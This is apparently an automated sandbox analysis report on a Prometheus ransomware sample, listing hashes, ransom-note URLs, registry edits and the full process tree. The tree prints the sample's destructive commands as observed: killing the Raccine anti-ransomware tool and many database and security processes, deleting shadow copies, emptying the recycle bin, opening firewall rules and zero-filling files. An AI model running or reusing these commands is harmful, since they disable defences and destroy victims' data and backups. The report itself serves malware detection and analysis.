Analysis
-
max time kernel
53s -
max time network
61s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
12-05-2021 00:06
Static task
static1
Behavioral task
behavioral1
Sample
e1f063d6_by_Libranalysis.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
e1f063d6_by_Libranalysis.exe
Resource
win10v20210408
General
-
Target
e1f063d6_by_Libranalysis.exe
-
Size
142KB
-
MD5
e1f063d63a75e0e0e864052b1a50ab06
-
SHA1
75d941a28cf0ade2ef2c16dfacbdeb36a51ccaf7
-
SHA256
8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7
-
SHA512
25681b210ee18bd60ba3fef496769283d51dc516569e1f1834d6d23a5927c1684b25ff67baf5fba66c908b364a13784f49facdde7a98b2fb8a8a41a2ec792ae3
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Extracted
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
http://promethw27cbrcot.onion/ticket.php?track=141-5D9-Y454
http://prometheusdec.in/ticket.php?track=141-5D9-Y454
Signatures
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Deletes itself 1 IoCs
pid Process 704 cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk e1f063d6_by_Libranalysis.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" e1f063d6_by_Libranalysis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" e1f063d6_by_Libranalysis.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 48 IoCs
pid Process 664 taskkill.exe 328 taskkill.exe 1340 taskkill.exe 2036 taskkill.exe 1624 taskkill.exe 560 taskkill.exe 1600 taskkill.exe 1508 taskkill.exe 1764 taskkill.exe 1100 taskkill.exe 1668 taskkill.exe 1840 taskkill.exe 876 taskkill.exe 1792 taskkill.exe 1608 taskkill.exe 1804 taskkill.exe 1160 taskkill.exe 952 taskkill.exe 544 taskkill.exe 1608 taskkill.exe 1296 taskkill.exe 1072 taskkill.exe 1060 taskkill.exe 1028 taskkill.exe 1644 taskkill.exe 1148 taskkill.exe 960 taskkill.exe 1468 taskkill.exe 924 taskkill.exe 1600 taskkill.exe 2032 taskkill.exe 1648 taskkill.exe 1640 taskkill.exe 1540 taskkill.exe 1288 taskkill.exe 1952 taskkill.exe 864 taskkill.exe 1340 taskkill.exe 1752 taskkill.exe 304 taskkill.exe 1636 taskkill.exe 932 taskkill.exe 1316 taskkill.exe 1972 taskkill.exe 616 taskkill.exe 988 taskkill.exe 1632 taskkill.exe 1244 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1796 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 664 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 1652 e1f063d6_by_Libranalysis.exe Token: SeDebugPrivilege 876 taskkill.exe Token: SeDebugPrivilege 1792 taskkill.exe Token: SeDebugPrivilege 1640 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 1804 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 864 taskkill.exe Token: SeDebugPrivilege 1316 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 1972 Process not Found Token: SeDebugPrivilege 304 taskkill.exe Token: SeDebugPrivilege 1752 conhost.exe Token: SeDebugPrivilege 1540 conhost.exe Token: SeDebugPrivilege 664 taskkill.exe Token: SeDebugPrivilege 960 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe Token: SeDebugPrivilege 1468 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 544 taskkill.exe Token: SeDebugPrivilege 328 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 988 taskkill.exe Token: SeDebugPrivilege 952 taskkill.exe Token: SeDebugPrivilege 1636 taskkill.exe Token: SeDebugPrivilege 932 taskkill.exe Token: SeDebugPrivilege 924 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 1340 taskkill.exe Token: SeDebugPrivilege 1600 taskkill.exe Token: SeDebugPrivilege 1632 taskkill.exe Token: SeDebugPrivilege 1296 taskkill.exe Token: SeDebugPrivilege 1668 taskkill.exe Token: SeDebugPrivilege 1624 taskkill.exe Token: SeDebugPrivilege 1840 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 560 taskkill.exe Token: SeDebugPrivilege 2032 taskkill.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 1288 taskkill.exe Token: SeDebugPrivilege 1072 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 1100 taskkill.exe Token: SeDebugPrivilege 1028 taskkill.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeDebugPrivilege 1244 taskkill.exe Token: SeDebugPrivilege 1952 taskkill.exe Token: SeDebugPrivilege 1972 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe 1652 e1f063d6_by_Libranalysis.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1652 wrote to memory of 876 1652 e1f063d6_by_Libranalysis.exe 30 PID 1652 wrote to memory of 876 1652 e1f063d6_by_Libranalysis.exe 30 PID 1652 wrote to memory of 876 1652 e1f063d6_by_Libranalysis.exe 30 PID 1652 wrote to memory of 544 1652 e1f063d6_by_Libranalysis.exe 32 PID 1652 wrote to memory of 544 1652 e1f063d6_by_Libranalysis.exe 32 PID 1652 wrote to memory of 544 1652 e1f063d6_by_Libranalysis.exe 32 PID 1652 wrote to memory of 1796 1652 e1f063d6_by_Libranalysis.exe 34 PID 1652 wrote to memory of 1796 1652 e1f063d6_by_Libranalysis.exe 34 PID 1652 wrote to memory of 1796 1652 e1f063d6_by_Libranalysis.exe 34 PID 1652 wrote to memory of 1840 1652 e1f063d6_by_Libranalysis.exe 36 PID 1652 wrote to memory of 1840 1652 e1f063d6_by_Libranalysis.exe 36 PID 1652 wrote to memory of 1840 1652 e1f063d6_by_Libranalysis.exe 36 PID 1652 wrote to memory of 772 1652 e1f063d6_by_Libranalysis.exe 38 PID 1652 wrote to memory of 772 1652 e1f063d6_by_Libranalysis.exe 38 PID 1652 wrote to memory of 772 1652 e1f063d6_by_Libranalysis.exe 38 PID 1652 wrote to memory of 636 1652 e1f063d6_by_Libranalysis.exe 39 PID 1652 wrote to memory of 636 1652 e1f063d6_by_Libranalysis.exe 39 PID 1652 wrote to memory of 636 1652 e1f063d6_by_Libranalysis.exe 39 PID 1652 wrote to memory of 1296 1652 e1f063d6_by_Libranalysis.exe 43 PID 1652 wrote to memory of 1296 1652 e1f063d6_by_Libranalysis.exe 43 PID 1652 wrote to memory of 1296 1652 e1f063d6_by_Libranalysis.exe 43 PID 1652 wrote to memory of 932 1652 e1f063d6_by_Libranalysis.exe 44 PID 1652 wrote to memory of 932 1652 e1f063d6_by_Libranalysis.exe 44 PID 1652 wrote to memory of 932 1652 e1f063d6_by_Libranalysis.exe 44 PID 1652 wrote to memory of 1244 1652 e1f063d6_by_Libranalysis.exe 46 PID 1652 wrote to memory of 1244 1652 e1f063d6_by_Libranalysis.exe 46 PID 1652 wrote to memory of 1244 1652 e1f063d6_by_Libranalysis.exe 46 PID 1652 wrote to memory of 1876 1652 e1f063d6_by_Libranalysis.exe 47 PID 1652 wrote to memory of 1876 1652 e1f063d6_by_Libranalysis.exe 47 PID 1652 wrote to memory of 1876 1652 e1f063d6_by_Libranalysis.exe 47 PID 1652 wrote to memory of 2036 1652 e1f063d6_by_Libranalysis.exe 49 PID 1652 wrote to memory of 2036 1652 e1f063d6_by_Libranalysis.exe 49 PID 1652 wrote to memory of 2036 1652 e1f063d6_by_Libranalysis.exe 49 PID 1652 wrote to memory of 328 1652 e1f063d6_by_Libranalysis.exe 50 PID 1652 wrote to memory of 328 1652 e1f063d6_by_Libranalysis.exe 50 PID 1652 wrote to memory of 328 1652 e1f063d6_by_Libranalysis.exe 50 PID 1652 wrote to memory of 1120 1652 e1f063d6_by_Libranalysis.exe 53 PID 1652 wrote to memory of 1120 1652 e1f063d6_by_Libranalysis.exe 53 PID 1652 wrote to memory of 1120 1652 e1f063d6_by_Libranalysis.exe 53 PID 1652 wrote to memory of 1792 1652 e1f063d6_by_Libranalysis.exe 56 PID 1652 wrote to memory of 1792 1652 e1f063d6_by_Libranalysis.exe 56 PID 1652 wrote to memory of 1792 1652 e1f063d6_by_Libranalysis.exe 56 PID 1652 wrote to memory of 1640 1652 e1f063d6_by_Libranalysis.exe 61 PID 1652 wrote to memory of 1640 1652 e1f063d6_by_Libranalysis.exe 61 PID 1652 wrote to memory of 1640 1652 e1f063d6_by_Libranalysis.exe 61 PID 1652 wrote to memory of 1608 1652 e1f063d6_by_Libranalysis.exe 57 PID 1652 wrote to memory of 1608 1652 e1f063d6_by_Libranalysis.exe 57 PID 1652 wrote to memory of 1608 1652 e1f063d6_by_Libranalysis.exe 57 PID 1652 wrote to memory of 864 1652 e1f063d6_by_Libranalysis.exe 63 PID 1652 wrote to memory of 864 1652 e1f063d6_by_Libranalysis.exe 63 PID 1652 wrote to memory of 864 1652 e1f063d6_by_Libranalysis.exe 63 PID 1652 wrote to memory of 1600 1652 e1f063d6_by_Libranalysis.exe 62 PID 1652 wrote to memory of 1600 1652 e1f063d6_by_Libranalysis.exe 62 PID 1652 wrote to memory of 1600 1652 e1f063d6_by_Libranalysis.exe 62 PID 1652 wrote to memory of 1804 1652 e1f063d6_by_Libranalysis.exe 65 PID 1652 wrote to memory of 1804 1652 e1f063d6_by_Libranalysis.exe 65 PID 1652 wrote to memory of 1804 1652 e1f063d6_by_Libranalysis.exe 65 PID 1652 wrote to memory of 364 1652 e1f063d6_by_Libranalysis.exe 68 PID 1652 wrote to memory of 364 1652 e1f063d6_by_Libranalysis.exe 68 PID 1652 wrote to memory of 364 1652 e1f063d6_by_Libranalysis.exe 68 PID 1652 wrote to memory of 1316 1652 e1f063d6_by_Libranalysis.exe 70 PID 1652 wrote to memory of 1316 1652 e1f063d6_by_Libranalysis.exe 70 PID 1652 wrote to memory of 1316 1652 e1f063d6_by_Libranalysis.exe 70 PID 1652 wrote to memory of 1340 1652 e1f063d6_by_Libranalysis.exe 72 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" e1f063d6_by_Libranalysis.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" e1f063d6_by_Libranalysis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY NETWORK HAS BEEN HACKED" e1f063d6_by_Libranalysis.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" e1f063d6_by_Libranalysis.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe"1⤵
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1652 -
C:\Windows\system32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\system32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:544
-
-
C:\Windows\system32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1796
-
-
C:\Windows\system32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:1840
-
-
C:\Windows\system32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:772
-
-
C:\Windows\system32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:636
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1296
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:932
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:1244
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:1876
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:2036
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:328
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1120
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:364
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
PID:1340
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:1972
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:1896
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
PID:1752
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:1540
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:304
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:1508
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1244
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:760
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:636
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:1012
-
-
C:\Windows\system32\arp.exe"arp" -a2⤵PID:1644
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵
- Modifies Internet Explorer settings
PID:2032
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:1160
-
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:664
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\e1f063d6_by_Libranalysis.exe2⤵
- Deletes itself
PID:704 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1644
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "177189249013918887632054457611-15276065742062432051-156087160084169769-2018128497"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1540
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "49292760911824047601713768551-13609149652138848815234813462-1354040014-1576991462"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752